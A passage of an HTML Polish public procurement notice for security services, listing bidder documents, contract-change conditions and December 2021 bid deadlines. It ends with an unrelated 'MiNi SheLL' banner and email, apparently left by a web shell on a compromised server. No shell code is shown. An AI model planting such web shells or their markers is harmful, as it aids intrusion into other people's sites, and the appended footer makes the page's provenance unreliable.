uzyskać tych dokumentów – oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy ;<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi<br/>wykonawcami, wykaz o którym mowa powyżej, dotyczy usług, w których wykonaniu wykonawca ten<br/>bezpośrednio uczestniczył;<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami; <br/>3) wykaz narzędzi dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z<br/>informacją o podstawie do dysponowania tymi zasobami <br/>4) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia<br/>5) aktualna koncesja wydana przez ministra właściwego do spraw wewnętrznych na prowadzenie<br/>działalności gospodarczej w zakresie ochrony osób i mienia, wydaną na podstawie Ustawy z dnia 22<br/>sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz.U. z 2021r., poz. 1995).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa, wraz z<br/>ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby,<br/>potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji<br/>zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane<br/>zdolności dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych i<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia, mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają usługi do realizacji których te zdolności są<br/>wymagane.<br/>Warunek dotyczący posiadania koncesji będzie jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada wymaganą koncesję i<br/>wykona usługi, do których realizacji ta koncesja jest wymagana.<br/>W takim przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (według<br/>wzoru na załączniku nr 2b do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) wysokości wynagrodzenia wykonawcy,<br/>2) warunków płatności,<br/>3) zmiany zakresu czynności Wykonawcy,<br/>4) terminu rozpoczęcia realizacji umowy.<br/>2. Zmiany, o których mowa w ust. 3, mogą być dokonane w przypadku:<br/>1) przeszkód uniemożliwiających zastosowanie przyjętych w SWZ lub ofercie rozwiązań;<br/>2) wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają<br/>wprowadzenie zmian do umowy;<br/>3) przedłużających się procedur przetargowych i administracyjnych, mających wpływ na terminy<br/>umowne, opóźnienia zamawiającego w podpisaniu umowy;<br/>4) wystąpienia innych nieprzewidzianych przeszkód zewnętrznych;<br/>5) zmiany przepisów prawa skutkujących koniecznością zaktualizowania zakresu czynności<br/>Wykonawcy;<br/>6) zmiany stawki podatku od towarów i usług (VAT);<br/>7) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.<br/>3–5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz. U. z<br/>2020 r. poz. 2207, z poźn. zm.), lub wysokości minimalnej stawki godzinowej zgodnie z<br/>Rozporządzeniem Rady Ministrów z dnia 14 września 2021 r. w sprawie wysokości minimalnego<br/>wynagrodzenia za pracę oraz wysokości minimalnej stawki godzinowej w 2022 r. (Dz.U. z<br/>2021r., poz. 1960); jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez<br/>Wykonawcę,<br/>8) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne; jeżeli zmiany te będą<br/>miały wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>9) zmiany zasad gromadzenia i wysokości wpłat pracowniczych planów kapitałowych, o których<br/>mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych; jeżeli<br/>zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>10) zgłoszenia zamiaru wykonania części przedmiotu umowy przy pomocy podwykonawców;<br/>11) zmiany liczby osób skierowanych przez Wykonawcę do pełnienia funkcji pracownika ochrony<br/>lub koordynatora, w szczególności w przypadku zlecenia przez Zamawiającego wykonania prac<br/>budowlano-montażowych,<br/>12) mających wpływ na wykonanie umowy okoliczności związanych z ogłoszonym stanem<br/>zagrożenia epidemicznego lub stanem epidemii.<br/>3. Zamawiający informuje o możliwości dokonania zmiany umowy zawartej na okres dłuższy niż<br/>12 miesięcy w zakresie o którym mowa w art. 439 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://tmgdynia.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-28 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com